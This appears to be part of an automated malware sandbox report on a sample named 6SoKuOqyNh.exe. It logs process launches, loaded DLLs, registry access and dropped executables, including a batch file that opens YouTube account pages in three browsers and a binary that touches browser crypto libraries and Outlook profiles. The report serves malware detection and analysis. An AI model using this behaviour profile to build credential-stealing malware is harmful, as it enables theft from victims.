Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7056 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,9310775074731790964,8760316038364529683,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: winmm.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 6SoKuOqyNh.exe

Static file information: File size 1870848 > 1048576

